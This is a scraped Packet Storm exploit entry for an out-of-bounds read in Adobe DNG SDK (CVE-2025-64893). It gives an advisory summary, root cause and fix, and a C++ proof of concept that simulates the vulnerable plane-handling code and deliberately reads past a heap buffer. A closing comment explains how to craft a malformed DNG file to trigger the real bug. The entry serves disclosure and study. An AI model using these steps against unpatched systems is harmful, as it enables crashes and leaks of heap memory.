{“lastseen”:”2025-12-22T18:23:17″,”description”:”An out of bounds read vulnerability exists in Adobe DNG SDK versions prior to 1.7.1.2410 due to improper handling of raw images containing exactly two color planes fSrcPlanes = 2. The flaw occurs during image rendering when the SDK assumes a four-plane…”,”published”:”2025-12-22T00:00:00″,”modified”:”2025-12-22T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Adobe DNG SDK Missing Validation Out-Of-Bounds Read”,”source”:””,”references”:””,”id”:”PACKETSTORM:213205″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64893″],”sourceData”:”=============================================================================================================================================\\n | # Title : Adobe DNG SDK prior to v1.7.1.2410 Out-of-Bounds Read Due to Missing fSrcPlanes=2 Validation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : https:\/\/helpx.adobe.com\/security\/products\/dng-sdk.html |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/213066\/ \\u0026\\tCVE-2025-64893\\n \\n [+] Summary : An out-of-bounds read vulnerability exists in Adobe DNG SDK versions prior to 1.7.1.2410 due to improper handling of raw images containing exactly two color planes (fSrcPlanes = 2).\\n The flaw occurs during image rendering when the SDK assumes a four-plane layout and reads memory beyond the allocated heap buffer.\\n \\n [+] Root Cause :\\n \\n In dng_render_task::ProcessArea(), the SDK correctly handles images with 1, 3, or 4 color planes\\n but fails to validate the uncommon case where fSrcPlanes equals 2.\\n \\n When this condition occurs, execution incorrectly enters the four-plane processing path and\\n invokes DoBaselineABCDtoRGB(), which unconditionally reads from four source plane pointers\\n (sPtrA through sPtrD). Since only two planes are actually allocated, the remaining pointers\\n reference memory outside the valid heap buffer, resulting in out-of-bounds reads.\\n \\n [+] Impact :\\n \\n – Out-of-bounds heap memory read (information disclosure)\\n – Application crash (denial of service)\\n – Potential exploitation when chained with other memory corruption primitives\\n \\n [+] Attack Vector :\\n \\n A specially crafted DNG file containing a ColorMatrix tag with exactly six values forces\\n fColorPlanes to be set to 2. When such a file is processed (e.g., via dng_validate or any\\n application using the vulnerable DNG SDK), the invalid plane handling logic is triggered.\\n \\n [+] Fix :\\n \\n Adobe addressed this issue in DNG SDK version 1.7.1.2410, released on November 17, 2025.\\n Users are strongly advised to update immediately.\\n \\n [+] POC :\\n \\n #include \\u003ciostream\\u003e\\n #include \\u003ccstdint\\u003e\\n #include \\u003ccstdlib\\u003e\\n #include \\u003ccstring\\u003e\\n \\n \/\/ ============================================\\n \/\/ SIMULATION OF VULNERABLE DNG SDK CODE\\n \/\/ ============================================\\n \\n \/\/ Simplified pixel buffer structure\\n struct DngPixelBuffer {\\n uint8_t* data; \/\/ Raw pixel data\\n int32_t plane_step; \/\/ Offset between color planes (in floats)\\n int32_t row_step; \/\/ Offset between rows\\n int32_t col_step; \/\/ Offset between columns (usually 1)\\n \\n \/\/ Constructor\\n DngPixelBuffer(uint8_t* buffer, int32_t p_step, int32_t r_step, int32_t c_step)\\n : data(buffer), plane_step(p_step), row_step(r_step), col_step(c_step) {}\\n };\\n \\n \/\/ Simulated color conversion function (vulnerable version)\\n void DoBaselineABCDtoRGB(const float* planeA,\\n const float* planeB,\\n const float* planeC,\\n const float* planeD,\\n float* outputR,\\n float* outputG,\\n float* outputB,\\n uint32_t width,\\n const float* white_balance,\\n const float* color_matrix) {\\n \\n std::cout \\u003c\\u003c \\”[DEBUG] Processing \\” \\u003c\\u003c width \\u003c\\u003c \\” pixels with 4 planes assumption\\\\n\\”;\\n \\n \/\/ VULNERABLE: Accesses all 4 planes even when only 2 exist\\n for (uint32_t col = 0; col \\u003c width; col++) {\\n float a = planeA[col];\\n float b = planeB[col];\\n float c = planeC[col]; \/\/ OUT-OF-BOUNDS READ when fSrcPlanes=2!\\n float d = planeD[col]; \/\/ OUT-OF-BOUNDS READ when fSrcPlanes=2!\\n \\n \/\/ Simulate color conversion (simplified)\\n outputR[col] = a * 1.2f + c * 0.1f; \/\/ Uses illegal ‘c’\\n outputG[col] = b * 0.9f + d * 0.3f; \/\/ Uses illegal ‘d’\\n outputB[col] = a * 0.8f + b * 0.7f;\\n \\n \/\/ Debug output for first few pixels\\n if (col \\u003c 3) {\\n std::cout \\u003c\\u003c \\” Pixel \\” \\u003c\\u003c col \\u003c\\u003c \\”: A=\\” \\u003c\\u003c a \\u003c\\u003c \\” B=\\” \\u003c\\u003c b \\n \\u003c\\u003c \\” C=\\” \\u003c\\u003c c \\u003c\\u003c \\” D=\\” \\u003c\\u003c d \\u003c\\u003c \\”\\\\n\\”;\\n }\\n }\\n }\\n \\n \/\/ Simulated vulnerable ProcessArea function\\n void VulnerableProcessArea(DngPixelBuffer* src_buffer,\\n int32_t src_row,\\n int32_t src_cols,\\n int32_t src_planes) {\\n \\n std::cout \\u003c\\u003c \\”[DEBUG] ProcessArea called with src_planes=\\” \\u003c\\u003c src_planes \\n \\u003c\\u003c \\”, src_cols=\\” \\u003c\\u003c src_cols \\u003c\\u003c \\”\\\\n\\”;\\n \\n \/\/ Get pointer to first plane\\n const float* ptrA = reinterpret_cast\\u003cconst float*\\u003e(\\n src_buffer-\\u003edata + src_row * src_buffer-\\u003erow_step);\\n \\n \/\/ Allocate output buffers\\n float* outputR = new float[src_cols];\\n float* outputG = new float[src_cols];\\n float* outputB = new float[src_cols];\\n \\n if (src_planes == 1) {\\n std::cout \\u003c\\u003c \\”[INFO] Processing 1 plane (monochrome)\\\\n\\”;\\n \/\/ Safe: copy single plane to all three outputs\\n for (int32_t i = 0; i \\u003c src_cols; i++) {\\n outputR[i] = ptrA[i];\\n outputG[i] = ptrA[i];\\n outputB[i] = ptrA[i];\\n }\\n }\\n else if (src_planes == 3) {\\n std::cout \\u003c\\u003c \\”[INFO] Processing 3 planes (normal RGB)\\\\n\\”;\\n \/\/ Safe: three planes available\\n const float* ptrB = ptrA + src_buffer-\\u003eplane_step;\\n const float* ptrC = ptrB + src_buffer-\\u003eplane_step;\\n \\n for (int32_t i = 0; i \\u003c src_cols; i++) {\\n outputR[i] = ptrA[i] * 1.1f;\\n outputG[i] = ptrB[i] * 1.0f;\\n outputB[i] = ptrC[i] * 0.9f;\\n }\\n }\\n else {\\n \/\/ VULNERABLE: Assumes src_planes == 4\\n \/\/ But can be src_planes == 2!\\n std::cout \\u003c\\u003c \\”[WARNING] Entering 4-plane processing path\\\\n\\”;\\n \\n const float* ptrB = ptrA + src_buffer-\\u003eplane_step;\\n const float* ptrC = ptrB + src_buffer-\\u003eplane_step; \/\/ PROBLEM: May be OOB!\\n const float* ptrD = ptrC + src_buffer-\\u003eplane_step; \/\/ PROBLEM: Definitely OOB!\\n \\n \/\/ Print memory addresses to show the issue\\n std::cout \\u003c\\u003c \\”[DEBUG] Memory pointers:\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Plane A: \\” \\u003c\\u003c (void*)ptrA \\u003c\\u003c \\”\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Plane B: \\” \\u003c\\u003c (void*)ptrB \\u003c\\u003c \\”\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Plane C: \\” \\u003c\\u003c (void*)ptrC \\u003c\\u003c \\”\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Plane D: \\” \\u003c\\u003c (void*)ptrD \\u003c\\u003c \\”\\\\n\\”;\\n \\n \/\/ This will read out-of-bounds when src_planes=2\\n DoBaselineABCDtoRGB(ptrA, ptrB, ptrC, ptrD,\\n outputR, outputG, outputB,\\n src_cols,\\n nullptr, nullptr);\\n }\\n \\n \/\/ Print some output values\\n std::cout \\u003c\\u003c \\”[DEBUG] First 3 output pixels:\\\\n\\”;\\n for (int i = 0; i \\u003c 3 \\u0026\\u0026 i \\u003c src_cols; i++) {\\n std::cout \\u003c\\u003c \\” Pixel \\” \\u003c\\u003c i \\u003c\\u003c \\”: R=\\” \\u003c\\u003c outputR[i] \\n \\u003c\\u003c \\” G=\\” \\u003c\\u003c outputG[i] \\u003c\\u003c \\” B=\\” \\u003c\\u003c outputB[i] \\u003c\\u003c \\”\\\\n\\”;\\n }\\n \\n \/\/ Cleanup\\n delete[] outputR;\\n delete[] outputG;\\n delete[] outputB;\\n }\\n \\n \/\/ ============================================\\n \/\/ EXPLOIT DEMONSTRATION\\n \/\/ ============================================\\n \\n int main() {\\n std::cout \\u003c\\u003c \\”========================================\\\\n\\”;\\n std::cout \\u003c\\u003c \\”DNG SDK CVE-2025-64893 EXPLOIT DEMO\\\\n\\”;\\n std::cout \\u003c\\u003c \\”Heap Buffer Overflow Vulnerability\\\\n\\”;\\n std::cout \\u003c\\u003c \\” By indoushka \\\\n\\”;\\n std::cout \\u003c\\u003c \\”========================================\\\\n\\\\n\\”;\\n \\n \/\/ Configuration\\n const int32_t IMAGE_WIDTH = 10;\\n const int32_t IMAGE_HEIGHT = 1;\\n const int32_t PLANE_COUNT = 2; \/\/ This triggers the vulnerability!\\n const int32_t PLANE_STEP = IMAGE_WIDTH; \/\/ Each plane is width floats\\n \\n \/\/ Calculate buffer size\\n const size_t BUFFER_SIZE = PLANE_COUNT * PLANE_STEP * sizeof(float);\\n \\n std::cout \\u003c\\u003c \\”[CONFIG] Creating image with:\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Width: \\” \\u003c\\u003c IMAGE_WIDTH \\u003c\\u003c \\” pixels\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Height: \\” \\u003c\\u003c IMAGE_HEIGHT \\u003c\\u003c \\” rows\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Planes: \\” \\u003c\\u003c PLANE_COUNT \\u003c\\u003c \\” (THIS TRIGGERS THE BUG!)\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Plane step: \\” \\u003c\\u003c PLANE_STEP \\u003c\\u003c \\” floats\\\\n\\”;\\n std::cout \\u003c\\u003c \\” Buffer size: \\” \\u003c\\u003c BUFFER_SIZE \\u003c\\u003c \\” bytes\\\\n\\\\n\\”;\\n \\n \/\/ Allocate and initialize buffer\\n uint8_t* pixel_data = new uint8_t[BUFFER_SIZE];\\n float* float_data = reinterpret_cast\\u003cfloat*\\u003e(pixel_data);\\n \\n std::cout \\u003c\\u003c \\”[INIT] Initializing pixel data…\\\\n\\”;\\n \\n \/\/ Fill plane A (first plane)\\n for (int i = 0; i \\u003c IMAGE_WIDTH; i++) {\\n float_data[i] = static_cast\\u003cfloat\\u003e(i); \/\/ Plane A values: 0, 1, 2, …\\n }\\n \\n \/\/ Fill plane B (second plane)\\n for (int i = 0; i \\u003c IMAGE_WIDTH; i++) {\\n float_data[PLANE_STEP + i] = static_cast\\u003cfloat\\u003e(i + 100); \/\/ 100, 101, 102, …\\n }\\n \\n \/\/ Create pixel buffer\\n DngPixelBuffer buffer(pixel_data, \\n PLANE_STEP, \/\/ plane_step in floats\\n IMAGE_WIDTH * PLANE_COUNT * sizeof(float), \/\/ row_step in bytes\\n 1); \/\/ col_step\\n \\n std::cout \\u003c\\u003c \\”\\\\n[EXECUTION] Calling VulnerableProcessArea…\\\\n\\”;\\n std::cout \\u003c\\u003c \\”—————————————-\\\\n\\”;\\n \\n \/\/ Trigger the vulnerability!\\n \/\/ This will process a 2-plane image but use 4-plane logic\\n VulnerableProcessArea(\\u0026buffer, 0, IMAGE_WIDTH, PLANE_COUNT);\\n \\n std::cout \\u003c\\u003c \\”—————————————-\\\\n\\”;\\n \\n \/\/ Show what happens in memory\\n std::cout \\u003c\\u003c \\”\\\\n[MEMORY ANALYSIS]\\\\n\\”;\\n std::cout \\u003c\\u003c \\”Valid buffer range: \\” \\u003c\\u003c (void*)pixel_data \\n \\u003c\\u003c \\” to \\” \\u003c\\u003c (void*)(pixel_data + BUFFER_SIZE) \\u003c\\u003c \\”\\\\n\\”;\\n \\n \/\/ Calculate where ptrC and ptrD point to\\n const float* ptrA = reinterpret_cast\\u003cconst float*\\u003e(pixel_data);\\n const float* ptrC = ptrA + 2 * PLANE_STEP; \/\/ 2 planes ahead\\n const float* ptrD = ptrA + 3 * PLANE_STEP; \/\/ 3 planes ahead\\n \\n std::cout \\u003c\\u003c \\”ptrC points to: \\” \\u003c\\u003c (void*)ptrC \\u003c\\u003c \\”\\\\n\\”;\\n std::cout \\u003c\\u003c \\”ptrD points to: \\” \\u003c\\u003c (void*)ptrD \\u003c\\u003c \\”\\\\n\\”;\\n \\n \/\/ Check if pointers are out of bounds\\n if (reinterpret_cast\\u003cconst uint8_t*\\u003e(ptrC) \\u003e= pixel_data + BUFFER_SIZE) {\\n std::cout \\u003c\\u003c \\” -\\u003e ptrC is OUT OF BOUNDS!\\\\n\\”;\\n }\\n if (reinterpret_cast\\u003cconst uint8_t*\\u003e(ptrD) \\u003e= pixel_data + BUFFER_SIZE) {\\n std::cout \\u003c\\u003c \\” -\\u003e ptrD is OUT OF BOUNDS!\\\\n\\”;\\n }\\n \\n \/\/ Demonstrate potential information leak\\n std::cout \\u003c\\u003c \\”\\\\n[INFORMATION LEAK DEMO]\\\\n\\”;\\n std::cout \\u003c\\u003c \\”What ptrC might read (uninitialized memory after buffer):\\\\n\\”;\\n std::cout \\u003c\\u003c \\” First value at ptrC: \\” \\u003c\\u003c *ptrC \\u003c\\u003c \\”\\\\n\\”;\\n std::cout \\u003c\\u003c \\” This could contain sensitive data from heap!\\\\n\\”;\\n \\n \/\/ Cleanup\\n delete[] pixel_data;\\n \\n std::cout \\u003c\\u003c \\”\\\\n[RESULT]\\\\n\\”;\\n std::cout \\u003c\\u003c \\”The program successfully demonstrated:\\\\n\\”;\\n std::cout \\u003c\\u003c \\”1. Out-of-bounds memory reads\\\\n\\”;\\n std::cout \\u003c\\u003c \\”2. Potential information disclosure\\\\n\\”;\\n std::cout \\u003c\\u003c \\”3. In real DNG SDK, this could lead to:\\\\n\\”;\\n std::cout \\u003c\\u003c \\” – Application crash\\\\n\\”;\\n std::cout \\u003c\\u003c \\” – Information leak\\\\n\\”;\\n std::cout \\u003c\\u003c \\” – Possible code execution\\\\n\\”;\\n \\n return 0;\\n }\\n \\n \/\/ ============================================\\n \/\/ COMPILATION AND USAGE INSTRUCTIONS\\n \/\/ ============================================\\n \\n \/*\\n HOW TO COMPILE AND RUN:\\n \\n 1. Save the code to a file: dng_exploit_demo.cpp\\n \\n 2. Compile with g++:\\n g++ -o dng_exploit_demo dng_exploit_demo.cpp -std=c++11\\n \\n 3. Run the program:\\n .\/dng_exploit_demo\\n \\n EXPECTED OUTPUT:\\n – The program will simulate processing a 2-plane DNG image\\n – It will show the vulnerable code path being taken\\n – Memory addresses will demonstrate out-of-bounds access\\n – Information about potential data leak will be shown\\n \\n REAL-WORLD EXPLOITATION:\\n \\n To exploit the actual DNG SDK vulnerability:\\n \\n 1. Create a malicious DNG file:\\n – Set ColorMatrix tag with exactly 6 values (forces fColorPlanes=2)\\n – Include image data with only 2 color planes\\n \\n 2. Trigger processing:\\n – Use dng_validate or any application using vulnerable DNG SDK\\n – Command: dng_validate -tif output.tif malicious.dng\\n \\n 3. Potential impacts:\\n – Read sensitive data from heap memory\\n – Cause denial of service (crash)\\n – With careful heap grooming, possible code execution\\n \\n MITIGATION:\\n – Update to DNG SDK version 1.7.1.2410 or later\\n – Add proper validation for fSrcPlanes=2 case\\n – Validate bounds before accessing plane pointers\\n *\/\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213205″,”cvss”:{“score”:7.1,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:N\/UI:R\/S:U\/C:H\/I:N\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213205\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-22T18:23:17″,”description”:”An out of bounds read vulnerability exists in Adobe DNG SDK versions prior to 1.7.1.2410 due to improper handling of raw images containing exactly two…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,50,12,15,13,53,7,11,5],"class_list":["post-32460","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-71","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n